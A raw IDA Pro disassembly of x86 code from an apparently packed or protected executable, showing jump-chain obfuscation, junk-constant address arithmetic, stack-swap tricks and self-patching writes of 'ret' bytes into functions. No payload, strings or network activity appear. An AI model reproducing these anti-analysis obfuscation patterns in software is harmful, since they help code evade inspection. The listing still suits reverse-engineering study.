; FUNCTION CHUNK AT 0045B256 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_44A312
sub_43D5FD	endp

; ---------------------------------------------------------------------------

loc_43D605:				; CODE XREF: hvvrg7ie:00457386j
		adc	edx, ecx
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_43D607:				; CODE XREF: sub_4544DD:loc_457366j
		add	edx, 0A48138B7h
		rol	edx, 2
		or	edx, 8D5483CBh
		test	edx, 40h
		jmp	loc_449B22
; END OF FUNCTION CHUNK	FOR sub_4544DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_542. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43D622	proc near		; CODE XREF: hvvrg7ie:00448CE9j
					; hvvrg7ie:0044BE30p

; FUNCTION CHUNK AT 00450536 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, nullsub_429
		mov	byte ptr [eax],	0C3h
		jmp	loc_450536
sub_43D622	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448181

loc_43D634:				; CODE XREF: sub_448181+1j
		call	sub_44C782
; END OF FUNCTION CHUNK	FOR sub_448181
; START	OF FUNCTION CHUNK FOR sub_443375

loc_43D639:				; CODE XREF: sub_443375+10j
		jmp	loc_44B3BF
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
		jmp	ds:off_41D0AC
; ---------------------------------------------------------------------------

loc_43D644:				; CODE XREF: hvvrg7ie:0044FEF8j
		jmp	loc_44AA75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_43D649:				; CODE XREF: sub_451E6D-8A7Fj
		jmp	loc_4445F9
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_43D64E:				; CODE XREF: sub_43D47E+Dj
					; hvvrg7ie:0043F7F4j ...
		jno	loc_43B0B4
		pop	edx
		mov	eax, [esp+0]
		push	eax
		jmp	loc_43C9F3
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43D65E:				; CODE XREF: sub_450F97-13146j
		jns	loc_452078

loc_43D664:				; CODE XREF: sub_44CEC8+281Aj
		jmp	loc_43C73C
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD3E

loc_43D669:				; CODE XREF: sub_44DD3E+6j
		jmp	loc_45B319
; END OF FUNCTION CHUNK	FOR sub_44DD3E
; ---------------------------------------------------------------------------
		sbb	esi, ebx
		jmp	loc_452072
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_264. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B261

loc_43D677:				; CODE XREF: sub_45B261:loc_44418Ej
					; sub_45B261:loc_44419Cj
		rol	edx, 1Eh
		sub	edx, 818127A2h
		and	edx, 3AB80CF3h
		add	edx, 0E80D989Dh
		xchg	edx, [esp+0]
		jmp	loc_459918
; END OF FUNCTION CHUNK	FOR sub_45B261
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_43D694:				; CODE XREF: sub_452265-91CFj
		call	sub_44C6BE
; END OF FUNCTION CHUNK	FOR sub_452265
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43D699:				; CODE XREF: sub_44191F+16419j
		jmp	loc_44B01A
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456881

loc_43D69E:				; CODE XREF: sub_456881-14ED0j
		jmp	loc_43B965
; END OF FUNCTION CHUNK	FOR sub_456881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_43D6A3:				; CODE XREF: sub_4589D3-6EA3j
		jns	loc_44034A
		rol	ebx, 10h
		cdq

loc_43D6AD:				; CODE XREF: sub_4589D3:loc_43C50Bj
		mov	eax, [esp+0]
		push	esi
		push	0F1BE1248h
		pop	esi
		jmp	loc_43B8CE
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------

loc_43D6BC:				; CODE XREF: hvvrg7ie:loc_441483j
		xchg	edx, [esp]
		jmp	loc_457310
; ---------------------------------------------------------------------------

loc_43D6C4:				; DATA XREF: sub_43AF52+113ACo
		xchg	esi, [esp]
		jmp	sub_456423
; ---------------------------------------------------------------------------
dword_43D6CC	dd 0			; DATA XREF: sub_439549+6r
					; sub_44440B+4w ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43D6D0:				; CODE XREF: sub_450246-24D6j
		jmp	loc_4397E2
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
		align 2
		add	dl, [eax-0A206169h] ; DATA XREF: hvvrg7ie:0043E3FDw
; START	OF FUNCTION CHUNK FOR sub_44476B

loc_43D6DC:				; CODE XREF: sub_44476B+7j
		jmp	loc_456DA5
; END OF FUNCTION CHUNK	FOR sub_44476B
; ---------------------------------------------------------------------------
		db 21h,	63h, 4Fh
dword_43D6E4	dd 0			; DATA XREF: sub_444F71+4r
					; sub_43D247+16BBAw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43D6E8:				; CODE XREF: sub_43F227+1110Dj
		jmp	loc_448DA5
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444C9C

loc_43D6ED:				; CODE XREF: sub_444C9C-9987j
		jmp	nullsub_51
; END OF FUNCTION CHUNK	FOR sub_444C9C
; ---------------------------------------------------------------------------
		dw 0C225h
dword_43D6F4	dd 77D40000h		; DATA XREF: sub_4500FA-15202r
					; sub_451B45:loc_4430A0r ...
; ---------------------------------------------------------------------------

loc_43D6F8:				; DATA XREF: sub_453E08-E280o
		aad	0CDh
		retf	9927h
; ---------------------------------------------------------------------------
		db 19h,	2Eh, 8Ch
		db 63h,	1Bh, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADCB

loc_43D703:				; CODE XREF: sub_45ADCB+Aj
		jmp	loc_45492E
; END OF FUNCTION CHUNK	FOR sub_45ADCB
; ---------------------------------------------------------------------------
dword_43D708	dd 9Ch			; DATA XREF: sub_43EB47+1590r
					; hvvrg7ie:004588CAw
; ---------------------------------------------------------------------------

loc_43D70C:				; CODE XREF: hvvrg7ie:004545BEj
		jmp	sub_44DE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_43D711:				; CODE XREF: sub_45A0B1-13C2Cj
		jmp	loc_43EC5C
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_43D716:				; CODE XREF: sub_44C072-DC9Ej
					; hvvrg7ie:loc_447AD8j
		and	ebx, edx
		mov	[ecx], ebp

loc_43D71A:				; CODE XREF: sub_443B00:loc_43E3C1j
		add	eax, 2A158E27h
		xchg	eax, [esp+4+var_4]
		jmp	loc_441602
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453CA3

loc_43D728:				; CODE XREF: sub_453CA3:loc_44F245j
		lea	eax, sub_445B46
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B314
; END OF FUNCTION CHUNK	FOR sub_453CA3
; ---------------------------------------------------------------------------
		push	edx
		push	0ECDE501h
		jmp	loc_450DA8
; ---------------------------------------------------------------------------

loc_43D741:				; CODE XREF: hvvrg7ie:loc_44AA86j
		call	sub_443A00
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_43D746:				; CODE XREF: sub_44E1C9-115E1j
		jmp	loc_452052
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_43D74B:				; CODE XREF: sub_448663-DB46j
		jmp	loc_44D446
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_43D750:				; CODE XREF: sub_448BC0:loc_45097Fj
		call	sub_450C5A
		add	eax, 0F844F597h
		rol	eax, 19h
		add	eax, 253CD29Ah
		rol	eax, 0Fh
		xor	eax, 7114C82Eh
		jmp	loc_448D14
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43D772:				; CODE XREF: sub_450F97-8FBCj
		popf

loc_43D773:				; CODE XREF: sub_450F97:loc_44D021j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_45594D
		jmp	loc_4553EB
; END OF FUNCTION CHUNK	FOR sub_450F97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43D785:				; CODE XREF: hvvrg7ie:loc_439CCEj
		mov	ebp, edx
		xchg	ebp, [esp]
		call	sub_4585EE
		mov	eax, 1F1D4A60h
		call	sub_450C5A
		push	ebx
		jmp	loc_441976
; ---------------------------------------------------------------------------
		or	edx, 7A8AC02Eh
		sub	edi, 0ACBDF007h
		jnb	loc_44FFF0
		jz	loc_43DD37
		jmp	loc_458D07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_426. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589A2

loc_43D7BD:				; CODE XREF: sub_4589A2+16j
		jmp	loc_45212E
; END OF FUNCTION CHUNK	FOR sub_4589A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_43D7C2:				; CODE XREF: sub_456CD4:loc_43A983j
		push	0C0353685h
		pop	edi
		or	edi, 301837BAh
		test	edi, 10h
		jmp	loc_44C9E1
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_43D7D9:				; CODE XREF: sub_448100+EF28j
		jp	loc_440E78

loc_43D7DF:				; CODE XREF: sub_448100+10j
		add	eax, 88023F4Ch
		xchg	eax, [esp+0]
		jmp	loc_45A7C5
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_43D7ED:				; CODE XREF: hvvrg7ie:00454751j
		jb	loc_44427A
		push	334729A9h
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_43D7F8:				; CODE XREF: sub_43D964:loc_459EE4j
		add	edi, 2CE911D1h
		cmp	edi, 0E4617958h
		jmp	loc_453C44
; END OF FUNCTION CHUNK	FOR sub_43D964

; =============== S U B	R O U T	I N E =======================================



sub_43D809	proc near		; CODE XREF: hvvrg7ie:0043A5CBj
					; sub_44777Dp ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439DD9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043A546 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043E16D SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004430C4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004589F1 SIZE 00000005 BYTES

		jnz	loc_4430D2
		pop	edx
		mov	eax, [esp+0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		jmp	loc_439DD9
sub_43D809	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D81E:				; CODE XREF: hvvrg7ie:00458AC3j
					; hvvrg7ie:loc_45A16Ej
		sub	ebp, 51053312h

; =============== S U B	R O U T	I N E =======================================



sub_43D824	proc near		; CODE XREF: sub_445D53+1p

; FUNCTION CHUNK AT 00441A08 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_454E54
		mov	eax, 5AB1337Ah
		push	offset sub_450A7A
		jmp	loc_441A08
sub_43D824	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_43D83D:				; CODE XREF: sub_44E34F+Cj
		jmp	loc_43C6AE
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_43D842:				; CODE XREF: hvvrg7ie:0043ED3Dj
					; sub_453405:loc_44EB9Aj
		xchg	esi, edi
		jnz	loc_4415A9

loc_43D84A:				; CODE XREF: sub_44388C:loc_43ED12j
		add	edi, 81ABABC2h
		xor	edi, 6CC75A5Fh
		add	edx, edi
		pop	edi
		mov	edx, [edx]
		jmp	loc_43C620
; ---------------------------------------------------------------------------

loc_43D860:				; CODE XREF: sub_453405-167C0j
		jz	loc_455884
		jmp	loc_44CF9F
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_43D86B:				; CODE XREF: sub_4554E8:loc_443636j
		pop	eax

loc_43D86C:				; CODE XREF: hvvrg7ie:0043D4F9j
		add	eax, 0B92CD06Ch

loc_43D872:				; CODE XREF: hvvrg7ie:004415E6j
		rol	eax, 0Ch
		add	eax, 8A9A40C2h
		add	eax, ebp
		add	eax, 0AF946382h
		mov	eax, [eax]
		jmp	loc_44CBE2
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43D88A:				; CODE XREF: hvvrg7ie:00440C8Fj
					; sub_44D2F8:loc_4488B4j
		jg	loc_442B21
		xor	edi, 0FA9A65BCh
		cmp	edx, 0B2E1B70Fh
		jmp	loc_4410F0
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_43D8A1:				; CODE XREF: sub_451E6D-12BD9j
		xchg	edx, ebx
		test	edx, ecx
		jmp	loc_454CEA
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_43D8AA:				; CODE XREF: sub_45B9BB-6C46j
		jz	loc_44ADD5
		jmp	loc_4515EE
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45190C

loc_43D8B5:				; CODE XREF: sub_45190C-CE7Fj
		call	sub_44973C
		mov	eax, 0BC7399C0h
		push	offset sub_440964
		jmp	loc_444898
; END OF FUNCTION CHUNK	FOR sub_45190C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_43D8C9:				; CODE XREF: sub_43AB99:loc_44E34Aj
		jnz	loc_43E1EE
		jmp	loc_454D96
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------

loc_43D8D4:				; CODE XREF: hvvrg7ie:00443447j
		sbb	ebp, esi
		test	esi, eax
		jmp	loc_44A8BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43D8DD:				; CODE XREF: sub_43B3BE+12D26j
		sbb	ecx, 0BDDE075Ah
		cmp	ebx, 5381C539h
		jmp	loc_441EB5
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
		mov	[ebp+0], eax
		push	esi
		jmp	sub_443FCC

; =============== S U B	R O U T	I N E =======================================



sub_43D8F7	proc near		; CODE XREF: sub_44C20Fp
					; hvvrg7ie:0045583Ej
		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_43D910
		jmp	ds:off_41D08C
sub_43D8F7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448881

loc_43D906:				; CODE XREF: sub_448881+E22Fj
		jmp	nullsub_252
; END OF FUNCTION CHUNK	FOR sub_448881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43D90B:				; CODE XREF: sub_4465A6-A422j
		jmp	sub_45AB9D
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_43D910	proc near		; CODE XREF: sub_43D8F7+4p
					; hvvrg7ie:0043F798j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B494 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043C4B3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043CD7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044460C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457FBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457FFA SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00458256 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		jmp	loc_43CD7E
sub_43D910	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		ror	eax, 9
		mov	ds:dword_439CD4, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_43D928:				; CODE XREF: sub_4569C6-879Bj
		jmp	loc_45AB8C
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43D92D:				; CODE XREF: sub_43C0DE+D479j
		jz	loc_43CE88
		jmp	loc_4521A6
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

loc_43D938:				; CODE XREF: hvvrg7ie:loc_44A98Fj
		sub	eax, ebx
		test	esi, ebp
		jmp	loc_4593F6
; ---------------------------------------------------------------------------

loc_43D941:				; CODE XREF: hvvrg7ie:00442C55j
		mov	edi, 99AD6C4Fh

; =============== S U B	R O U T	I N E =======================================



sub_43D946	proc near		; CODE XREF: sub_45579D+Dp
		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [eax],	0C3h
		mov	[ebp-4], eax
		push	1Ch
		push	offset sub_43E938
		jmp	nullsub_537
sub_43D946	endp

; ---------------------------------------------------------------------------

loc_43D95C:				; CODE XREF: hvvrg7ie:0044BDECj
					; hvvrg7ie:loc_45AADBj
					; DATA XREF: ...
		xchg	edx, [esp]
		jmp	loc_442C1B

; =============== S U B	R O U T	I N E =======================================



sub_43D964	proc near		; CODE XREF: hvvrg7ie:0043B062j
					; sub_449232:loc_442803p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A253 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043C76A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D41C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043D7F8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440AA4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004453A1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446506 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452C16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454653 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454CC2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455F03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459EE4 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	edx
		push	0A6A48741h
		pop	eax

loc_43D96F:				; CODE XREF: sub_458F33-1D120j
		sub	eax, 0D485BFDBh
		test	eax, 1000h
		jmp	loc_43A253
sub_43D964	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43D980	proc near		; CODE XREF: sub_443D85:loc_443D8Fp
					; hvvrg7ie:0045A6DFj

; FUNCTION CHUNK AT 00439C45 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B800 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043BE4C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D282 SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	ds:dword_44BCA0, eax

loc_43D98A:				; CODE XREF: hvvrg7ie:00443785j
					; hvvrg7ie:0044FEF2j
		ror	eax, 14h
		xor	eax, 0D0439D7Ch
		push	edx
		jmp	loc_43BE4C
sub_43D980	endp

; ---------------------------------------------------------------------------
		call	sub_45B6F1
		or	eax, eax
		jnz	loc_4431DC
		jmp	loc_44A0F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43D9AB:				; CODE XREF: sub_440C05:loc_455958j
		jz	loc_45566A
		jmp	loc_441631
; END OF FUNCTION CHUNK	FOR sub_440C05

; =============== S U B	R O U T	I N E =======================================



sub_43D9B6	proc near		; DATA XREF: sub_43EBB6+5EDEo
		mov	eax, [eax]
		add	eax, [ebp-4]
		mov	[ebp-0Ch], eax
sub_43D9B6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C421

loc_43D9BE:				; CODE XREF: sub_43C421+8j
					; sub_43EED4+Bj ...
		mov	eax, [ebp-0Ch]
		push	offset loc_44B18B
		jmp	nullsub_35
; END OF FUNCTION CHUNK	FOR sub_43C421
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_43D9CB:				; CODE XREF: sub_44BEBB:loc_43CE43j
		jnz	loc_4461CC
		jmp	loc_43FDA7
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------

loc_43D9D6:				; CODE XREF: hvvrg7ie:0045454Aj
		test	eax, ebp
		jmp	loc_440C53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43D9DD:				; CODE XREF: sub_450AA8-161A6j
		pushf

loc_43D9DE:				; CODE XREF: sub_450AA8:loc_43A8F7j
		rol	ebx, 13h
		add	ebx, 94283AE4h
		xor	ebx, 7D0F2052h
		xor	eax, ebx
		push	offset loc_455C82
		jmp	nullsub_277
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_43D9F9	proc near		; DATA XREF: sub_44C2EA:loc_45810Fo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AA3F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448F8E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004510AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B787 SIZE 00000025 BYTES

		push	esi
		mov	esi, edx
		xchg	esi, [esp+4+var_4]
		call	sub_446D8D
		push	0C4FFF541h
		jmp	loc_4510AB
sub_43D9F9	endp

; ---------------------------------------------------------------------------
		sub	ebp, eax
		jmp	loc_45B2A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_43DA15:				; CODE XREF: sub_43CA70+1E440j
		sub	ebp, edx

loc_43DA17:				; CODE XREF: sub_43CA70+1E42Fj
		add	eax, 55C0A29Bh
		add	eax, ebp
		add	eax, 990E0AA8h
		mov	eax, [eax]
		test	byte ptr [eax+1], 80h
		jnz	loc_44718A
		jmp	loc_442B21
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCC7

loc_43DA36:				; CODE XREF: sub_43CCC7+1DB83j
		sub	esi, 0D860BE07h
		add	esi, 0C9AB0BA5h
		add	esi, ebp
		add	esi, 9038C26Fh
		mov	[esi], edx
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_43CCC7
; START	OF FUNCTION CHUNK FOR sub_44004A

loc_43DA4D:				; CODE XREF: sub_44004A-615Fj
		mov	eax, [ebp-0Ch]
		mov	esp, ebp
		jmp	loc_445286
; END OF FUNCTION CHUNK	FOR sub_44004A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABA3

loc_43DA57:				; CODE XREF: sub_44ABA3:loc_4527D7j
		jnz	loc_4416FE
		jmp	loc_43D5DE
; END OF FUNCTION CHUNK	FOR sub_44ABA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43DA62:				; CODE XREF: sub_445CCD+350Aj
		and	edi, 233FB845h
		rol	edi, 14h
		and	edi, 93768B24h
		xor	edi, 80520120h
		xchg	edi, [esp+8+var_8]
		jmp	loc_446A98
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_43DA7F:				; CODE XREF: hvvrg7ie:0045865Bj
		jbe	loc_4481A7
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_43DA85:				; CODE XREF: sub_45A7E8-21A4j
		or	eax, 0B24A2936h
		add	eax, 4C6AB0C5h
		mov	eax, [eax]
		jmp	loc_44EAEB
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DA99:				; CODE XREF: hvvrg7ie:004568C7j
		jmp	loc_454C7E
; ---------------------------------------------------------------------------

loc_43DA9E:				; CODE XREF: hvvrg7ie:0045455Cj
		jmp	loc_446A45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E72F

loc_43DAA3:				; CODE XREF: sub_44E72F-FFF3j
		cmp	dword ptr [ebp-1Ch], 66h
		jnz	loc_4576CA
		mov	eax, 6
		sub	eax, [ebp-0Ch]
		mov	[ebp-0Ch], eax
		jmp	loc_44063B
; END OF FUNCTION CHUNK	FOR sub_44E72F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_43DABD:				; CODE XREF: sub_44A87E+17j
					; hvvrg7ie:00452E17j
		push	eax
		call	sub_44612F
		mov	[ebp-4], eax

loc_43DAC6:				; CODE XREF: hvvrg7ie:00443128j
					; sub_44A87E+Bj ...
		mov	eax, [ebp-1Ch]
		call	sub_44F66B
		jmp	loc_4449E5
; END OF FUNCTION CHUNK	FOR sub_44A87E
; ---------------------------------------------------------------------------

loc_43DAD3:				; CODE XREF: hvvrg7ie:0044B686j
		jz	loc_43B652
		mov	eax, [ecx]
		jnb	loc_443C46
; START	OF FUNCTION CHUNK FOR sub_449007

loc_43DAE1:				; CODE XREF: sub_449007+266Aj
		add	esi, 875525A5h
		jmp	loc_456E46
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43DAEC:				; CODE XREF: sub_43C811+18F11j
		mov	edx, eax
		popf
		sub	ebp, edx
		jmp	loc_44DAD5
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43DAF6:				; CODE XREF: sub_442FD1+753Aj
		push	offset loc_43C8F2
		jmp	loc_43F756
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_43DB00:				; CODE XREF: hvvrg7ie:0043F8D3j
		sbb	ecx, esi
		sbb	edx, 6CC785B8h
		xor	edx, 0B1CECEC9h
; START	OF FUNCTION CHUNK FOR sub_442301

loc_43DB0E:				; CODE XREF: sub_442301-2A3Aj
		and	edx, 0F487BE44h
		add	edx, 0BD0C7E69h
		jmp	loc_44A94F
; END OF FUNCTION CHUNK	FOR sub_442301
; ---------------------------------------------------------------------------

loc_43DB1F:				; CODE XREF: hvvrg7ie:004425CAj
		and	esi, 0DF312E3h
		rol	esi, 0Ch
		xor	esi, 49430A44h
		add	esi, 97DB6CDBh
		xchg	esi, [esp]
		jmp	sub_450C5A
; ---------------------------------------------------------------------------

loc_43DB3C:				; CODE XREF: hvvrg7ie:0044A5EDj
		not	eax

loc_43DB3E:				; CODE XREF: hvvrg7ie:loc_4478D0j
		push	7E50284Ch
		pop	eax
		rol	eax, 1Bh
		jmp	loc_44B96B

; =============== S U B	R O U T	I N E =======================================



sub_43DB4C	proc near		; CODE XREF: sub_44FED8+2p
					; hvvrg7ie:00451C83j

; FUNCTION CHUNK AT 00439D41 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D2D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409C7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443A11 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044BB7A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044D685 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453382 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456324 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459555 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459D90 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B22C SIZE 00000013 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		mov	esp, ebp
		xchg	ebx, [esp+0]
		mov	ebp, ebx
		pop	ebx
		jmp	loc_43D2D3
sub_43DB4C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA1C

loc_43DB5E:				; CODE XREF: sub_44AA1C:loc_44EC7Ej
		pop	eax
		and	eax, 0A0467616h
		sub	eax, ds:4000F8h
		add	eax, 72DEE244h
		jmp	loc_43C663
